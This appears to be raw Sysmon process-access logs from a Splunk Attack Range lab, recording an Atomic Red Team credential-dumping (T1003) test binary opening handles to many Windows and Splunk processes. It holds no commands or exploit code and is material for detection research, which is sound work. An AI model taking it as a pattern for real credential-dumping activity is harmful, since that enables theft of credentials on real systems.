17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 